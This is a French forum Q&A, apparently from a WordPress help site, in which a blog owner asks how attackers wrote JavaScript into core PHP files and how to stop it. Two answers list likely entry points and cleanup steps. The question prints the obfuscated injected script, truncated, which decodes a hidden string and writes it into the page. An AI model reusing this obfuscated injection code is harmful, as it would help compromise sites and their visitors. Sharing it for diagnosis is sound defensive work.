Comment les attaquants écrivent des scripts dans mes fichiers php?

4

J'ai un blog créé avec Wordpress, maintenant j'ai un problème. Les attaquants écrivent des codes javascript dans mes fichiers.

Supposons que j'ai des trous dans mes scripts de plugin, mais comment peuvent-ils écrire dans des fichiers php?

ici fait partie de la liste des fichiers php, dans lesquels ils écrivent le script ( index.php, wp-activate.php, wp-comments-post.php, wp-settings.php ... )

et voici le javascript dans lequel ils écrivent

<script type="text/javascript" language="javascript">kxjwm="225222 ... 2";madds=100;wljam=this;cjayr="i"+"te";geijt=116;fsmuj="wr"+cjayr;for(yadii in wljam){if(yadii.length==8 && yadii.charCodeAt(0)==madds && yadii.charCodeAt(7)==geijt){break;}}o="";bqcqp=0;qczew=wljam[yadii];dlhge=53;while (bqcqp<kxjwm.length){voxhw=0;for(evedn=0;evedn<8;evedn++){voxhw=voxhw<<1;if(kxjwm.charCodeAt(bqcqp+evedn)==dlhge){voxhw++;}}bqcqp=bqcqp+3;qczew[fsmuj](String.fromCharCode(voxhw));bqcqp=bqcqp+5;}</script>

Comment puis-je prévenir de telles attaques?

Je n'ai aucune expérience de Wordpress, toute aide sera donc très utile.

Merci beaucoup

    
posée Syom 31.01.2011 - 13:57

2 réponses

5

Bonjour @Syom:

Les pirates informatiques y ont souvent accès, car vous utilisez le nom "admin" pour votre administrateur et vous disposez d'un mot de passe facile à pirater. Ou parce que vous ne mettez pas à jour votre logiciel et qu'il exploite certaines des failles de sécurité trouvées et corrigées.

Voici une série de diapositives expliquant en détail comment sécuriser votre site WordPress qui vient d'être présenté à WordCamp Phoenix le week-end dernier:

Voici quelques articles de blog d'Otto sur le sujet:

réponse donnée MikeSchinkel 31.01.2011 - 14:06
1

Il existe plusieurs manières possibles:

  • connexion FTP / SSH compromise;
  • connexion WordPress compromise;
  • configuration de la sécurité du serveur défectueuse;
  • serveur compromis;
  • une sorte de porte dérobée installée;
  • etc.

Vous devez contacter le service d’hébergement immédiatement, tout dépend de la qualité et du prix de votre hébergement.

Par ailleurs, si vous n’êtes pas confiant dans les compétences techniques, je vous suggère de rechercher quelqu'un qui s'occupe de nettoyer les blogs piratés de manière professionnelle, sinon vous ne serez pas sûr des détails du piratage et de la sécurité à l'avenir.

    
réponse donnée Rarst 31.01.2011 - 14:57

Lire d'autres questions sur les étiquettes